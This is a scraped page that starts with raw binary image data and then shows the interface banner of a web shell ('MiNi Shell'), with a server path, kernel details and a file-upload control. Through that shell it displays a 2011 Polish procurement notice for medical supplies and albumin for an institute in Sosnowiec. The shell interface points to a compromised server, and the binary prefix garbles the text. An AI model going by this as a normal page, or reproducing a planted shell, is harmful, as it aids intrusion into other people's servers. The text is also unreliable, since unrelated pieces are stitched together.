JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110530/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110530/134988-N-2011.html

<p class="kh_header"><b>Sosnowiec: Sukcesywna dostawa materiałów medycznych i albumin dla Apteki Instytutu Medycyny Pracy i Zdrowia Środowiskowego</b><br>
<b>Numer ogłoszenia: 134988 - 2011; data zamieszczenia: 30.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Medycyny Pracy i Zdrowia Środowiskowego , ul. Kościelna 13, 41-200 Sosnowiec, woj. śląskie, tel. 032 2660885, faks 032 2661124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.imp.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa materiałów medycznych i albumin dla Apteki Instytutu Medycyny Pracy i Zdrowia Środowiskowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet 1 
MATERJAŁY JAŁOWE

L.p.	Asortyment	
j.m.
	Zapotrzebowanie na 24 ms.
1.		Strzykawka  Janeta 100 ml	szt	250
2.		Strzykawka  20 ml x 100 szt	op	150
3.		Strzykawka  5 ml x 100 szt	op	200
4.		Strzykawka  10 ml x 100 szt	op	250
5.		Strzykawka  2 ml x100 szt.	op	150
6.		Strzykawka do przepłukiwania , napełniona fabrycznie NaCl 0,9% jałowa, poj. 3,5,10 ml, każda o tej samej średnicy z barwnym kodem dla łatwej identyfikacji 	szt	120
7.		Strzykawka do pomp infuzyjnych z gumowym tłokiem 50 ml	szt	1 000
8.		Strzykawka do pomp infuzyjnych z gumowym tłokiem 20 ml	szt	50
9.		Strzykawka insulinówka z igłą 1ml x 100 szt	op	20
10.		Strzykawka tuberkulinowa z igłą  x100 szt	op	15
11.		Kaniula z portem do dodatkowych wstrzyknięć  wykonana z poliuretanu  z czterema paskami kontrastującymi  pod RTG 0,8-1,2 	szt	5 000
12.		Koreczek do kaniul 	szt	3 000
13.		Igła iniekcyjna  x 100 szt rozm. 0,5-0,9	op	500
14.		Igła iniekcyjna   x 100 szt. rozm. 0,3	op	10
15.		Igła iniekcyjna  x 100 szt. rozm. 1,1-1,2	op	250
16.		Igła do nakłuć lędźwiowych  1,2 X 90 mm	szt	25
17.		Igła typu motylek x 50 szt.	op	10
18.		Pleurecan  -zestaw do drenażu opłucnej	szt	5
19.		Zestaw do punkcji pęcherza moczowego 	szt	5
20.		Przyrząd do wielokrotnej aspiracji płynu z filtrem przeciwbakteryjnym. Wymagania techniczne:plastikowy kolec z dwoma kanałami infuzyjnymi i powietrznymi, plastikowa płytka umożliwiająca łatwe wprowadzenie do butelki, filtr bakteryjny 0,45um, zabezpieczenie przed przypadkowym zakażeniem miejsca łączenia aparatu ze strzykawką przy otwartej zatyczce, samozamykająca zatyczka zamykająca aparat.	szt	700
21.		Przedłużacz do pomp infuzyjnych jałowy 	szt	600
22.		Przedłużacz do pomp infuzyjnych wykonany z PE	szt	200
23.		Zestaw bursztynowy  do nitrogliceryny jałowy 20  kropli/ml długość 272 cm, filtr powietrza 3 mikrony, filtr w linii 15 mikronów. Zawiera odpowietrznik oraz port do podłączenia drugiego kanału.	szt	60
24.		Przyrząd do przetaczania krwi i jej preparatów	szt	100
25.		Przyrząd do infuzji nie zawierający ftalanów (na opakowaniu nadruk brak PVC), dren wykonany z elastycznego silikonu, końcówka luer lock wykonana z poliwęglanu. Sterylizowany radiacyjnie. 	szt	12 000
26.		Przyrzad do przetaczania krwi  OCŻ 	szt	150
27.		Zestaw uniwersalny do pomp infuzyjnych jałowy 20  kropli/ml długość 264 cm, filtr powietrza 3 mikrony, filtr w linii 15 mikronów. Zawiera odpowietrznik, port do igły oraz port do podłączenia drugiego kanału.	szt	150
28.		Rękawice chirurgiczne jałowe różne rozmiary 	para	600
29.		Cewnik do odsysania górnych dróg oddechowych rozm. 12,14,16 	szt	10 000
30.		Cewnik do podawania tlenu przez nos jałowy	szt	300
31.		Cewnik Nelaton rozm. 12,14,16	szt	50
32.		Cewnik Foleya CH/F12, CH/F14, CH/F 16 ;CH/F20 	szt	200
33.		Sterylny zestaw do cewnikowania pęcherza moczowego w zestawie cewnik foleya, rękawice, serwety, worek na mocz	szt	60
34.		Przewód do ssaka z łącznikiem 	szt	800
35.		Dren tlenowy długość  min. 4 m jałowy	szt	1000
36.		Przedłużacz do podłączania rurki intubacyjnej z filtrem oddechowym, rozciągliwy do 15 cm złącza 22mmM/15mmF; łącznik podwójnie obrotowy, port do odsysania sterylny	szt	200
37.		Zatyczka do cewników jałowa	szt	500
38.		Zgłębnik dwunastniczy jałowy 	szt	10
39.		Zgłębnik żołądkowy  jałowy CH 18-26 	szt	100
40.		Zgłębnik żołądkowy  CH 30 -36	szt	50
41.		Kanka doodbytnicza jałowa CH24 	szt	20
42.		Kranik trójdrożny jałowy 	szt	1000
43.		Maska do tlenu dla dorosłych jałowa	szt	1500
44.		Maska do tlenu z drenem i rezerwuarem tlenu	szt	25
45.		Ostrza chirurgiczne  nr 25 x 100 szt	szt	5
46.		Penseta jednorazowa sterylna 	szt	500
47.		Worek do dobowej zbiórki moczu jałowy 	szt	500
48.		Zestaw do godzinowej zbiórki moczu sterylny z komorą pomiarową o poj. 500 ml ze skalą pomiarową co 1ml do min 40ml, z workiem o pojemności 2l z tylną białą ścianką  , zastawką antyzwrotną w łaczniku z cewnikiem Foleya i worku z filtrem hydrofobowym w worku i komorze oraz odpływem, dren dwukanałowy wyposażony w port bezigłowy do pobierania próbek moczu	szt	40
49.		Wymiennik ciepła i wilgoci z portem do tlenu 	szt	250
50.		Filtr mechaniczny hydrofobowy 24-godzinny . Skuteczność filtracji w środowisku wilgotnym 100 % , objętośc filtra 35ml+/- 5 % . Sterylizowany radiacyjnie 	szt	150
51.		Filtr mechaniczny hydrofobowy 48-godzinny . Skuteczność filtracji w środowisku wilgotnym 100 % , objętośc filtra 85ml+/- 5 % . Sterylizowany radiacyjnie 	szt	20
52.		Obwód oddechowy do respiratora dla dorosłych,  2 rury karbowane o dł. 160 cm z PE (polietylenu) , kolanko z portem luer-lock, trójnik Y z dwoma portami zabezpieczone koreczkami przytwierdzonymi na stałe do obwodu , średnica rur 22mm, średnica złącz do respiratora 22mmF, złącza wykonane z elastycznego materiału EVA (octan winylu),  złączka prosta 22mmM-22mmM, 1 pułapka wodna, dodatkowa rura o dł. 60 cm, sterylny 	szt	150
53.		Prowadnica intubacyjna jednorazowa jałowa	szt	100
54.		Rurka ustno-gardłowa jałowa nr 2,3,4	szt	1200
55.		Rurka intubacyjna jałowa rozm.  7,8,9	szt	150
56.		Rurka tracheostomijna nr 7,8,9	szt	20
57.		Lancet do testów alergologicznych x 200 szt	op	25
58.		Szpatułka drewniane jałowe x 100 szt.	op	4
59.		Maska krtaniowa jednorazowa jałowa rożne rozmiary 	szt	20
60.		Nici chirurgiczne 2,0 ;3,0 x 12 szt.	op.	6



Pakiet 2
MATERJAŁY JAŁOWE- CEWNIKI

L.p.	Asortyment	
j.m.
	Zapotrzebowanie na 24 ms.
1.		Zestaw do kaniulacji żył centralnych metodą Selingera, do hemodializy i hemoperfuzji, w skład którego wchodzi:                                                           -cewnik do hemodializy dla dorosłych, zakrzywiony, dwuświatłowy w rozmiarze 14Fr/20 cm wykonany z poliuretanu, z połączeniem cewnika z zestawem do przetoczeń typu Luer Lock, zaworami membranowymi, kolorystycznymi oznakowaniami linii żylnej i tętniczej, podanymi na cewniku danymi dotyczącymi pojemności każdego kanału i długości cewnika,                                                                                                                  - igła cienkościenna 18Ga/6,35cm                                                    
-prowadnica typu J z podajnikiem                                                   
- rozszerzadło co najmniej jedno                                                                                                -skalpel                                                                                                           -strzykawka                                                                                             
-stabilizator umożliwiający przyszycie cewnika do powłok.                         Opakowanie typu blister	szt.	30
2.		Zestaw do kaniulacji żył centralnych metodą Selingera, do hemodializy i hemoperfuzji, w skład którego wchodzi:                                                                      -cewnik do hemodializy dla dorosłych, prosty, dwuświatłowy w rozmiarze 12Fr/20 cm wykonany z poliuretanu, z połączeniem cewnika z zestawem do przetoczeń typu Luer Lock, zaworami membranowymi, kolorystycznymi oznakowaniami linii żylnej i tętniczej, podanymi na cewniku danymi dotyczącymi pojemności każdego kanału i długości cewnika, 
- igła cienkościenna 18Ga/6,35cm,                                                           
-prowadnica typu J z podajnikiem ,                                                        
 - rozszerzadło co najmniej jedno                                                                                                                                                                     -strzykawka ,                                                                                               
-stabilizator umożliwiający przyszycie cewnika do powłok.                         Opakowanie typu blister	szt.	30
3.		Zawór dostępu naczyniowego bezigłowy kompatybilny z połączeniem luer lock i luer, posiadający podzielną silikonową membranę idealnie głądką i jednorodną , bez elementów lub mechanizmów wewnętrznych , posiadający przezroczystą obudowę, pakowany pojedynczo, sterylny, czas stosowania 7 dni 	szt	50
4.		Cewnik jednoświatłowy do żyły podobojczykowej zakładany przez kaniulę wykonany z poliuretanu Certon,  3 wtopione paski, znaczniki długości, rozmiar cewnika wytłoczony na obsadce rozm. 1,1x1,7 długość 45cm	szt.	250
5.		Cewnik dwuświatłowy do żyły podobojczykowej zakładany przez kaniulę wykonany z poliuretanu Certon z rozrywalną kaniulą , prowadnicą z końcówką J, kabelkiem łączącym i skalpelem 11. Rozm.cewnika  6F/dł. 45cm, kaniula 12G 	szt	60
6.		Cewnik dwuświatłowy do żyły szyjnej zakładany metodą Selingera 14Ga/20 cm	szt	50



Pakiet 3

MATERJAŁY OPATRUNKOWE

L.p.	Asortyment	
j.m.
	Zapotrzebowanie na 24 ms.
1.		Gaza niejałowa	mb	500
2.		Kompresy gazowe jałowe 10cm x10 cm x3 szt 	op	100
3.		Kompresy gazowe niejałowe 10cm x10 cm x100szt	op	1200
4.		Opaska elastyczna 4m x 15cm	szt	30
5.		Opaska gazowa 4 m x 10 cm	szt	30 000
6.		Plastry hypoalergiczne 2,5cm x 5m	szt	250
7.		Poloplastr 1,25 cm x5 m	szt	500
8.		Poloplastr 2,5 cm x5 m	szt	500
9.		Poloplastr  5 cm x5 m	szt	200
10.		Polyskin x 200 szt	op	5
11.		Prestoplastr 10 cm x 6 cm x 100szt	op	6
12.		Vena-Plast x 50 szt	op	120
13.		Wata celulozowa x 5 kg	op	150
14.		Wata opatrunkowa x 0,5 kg	op	10
15.		Opatrunki hydrokoloidowe 12cm x 24cm x 5szt	op	5
16.		Kompresy jałowe 5cm x 5 cm x 3szt	op	100
17.		Opatrunek na rany sterylny absorbujący 7,2 x 5 cm x 50szt	op	10
18.		Pieluchomajtki rozm. M x 30 szt.	op	2
19.		Pieluchomajtki rozm. L x 30 szt.	op	2
20.		Sterylny, samoprzylepny opatrunek na ranę pooperacyjną, z absorbcyjną , nieprzywierającą warstwą chłonną, nasączoną płynem przeciwdrobnoustojowym PHMB, rozmiar 10x12,5cmx 25 szt.	op	2
21.		Antybakteryjna gąbka opatrunkowa do drenów i cewników dożylnych, nasączona płynem PHMB 5x5cmx70 szt.	op	2


Pakiet 4
ALBUMINY
L.p.	Asortyment	
j.m.
	Zapotrzebowanie na 24 ms.
7.		Albuminy 20 % 100 ml	OP.	250.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.60.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie, że dostarczony przedmiot umowy posiada wymagane dokumenty, deklaracje zgodności i jest oznakowany znakiem CE lub posiada wpis do rejestru wyrobów medycznych (zgodnie z ustawa o wyrobach medycznych z dnia 20 kwietnia 2004r.)- dla Pakietu 1,2,3,4
Aktualne dokumenty dopuszczające do obrotu i używania asortyment objęty zamówieniem- zgodnie z ustawą o wyrobach medycznych z dnia 20.04.2004 roku (Dz. U. Nr 93 poz. 896 z późn. zm.)- dla Pakietu 1,2,3,4</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje możliwość zmian zapisów umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.imp.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W Sekretariacie Głównym IMPiZŚ, pok.103, ul. Kościelna 13, Sosnowiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2011 godzina 10:00, miejsce: W Sekretariacie Głównym IMPiZŚ, pok.103, ul. Kościelna 13, Sosnowiec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com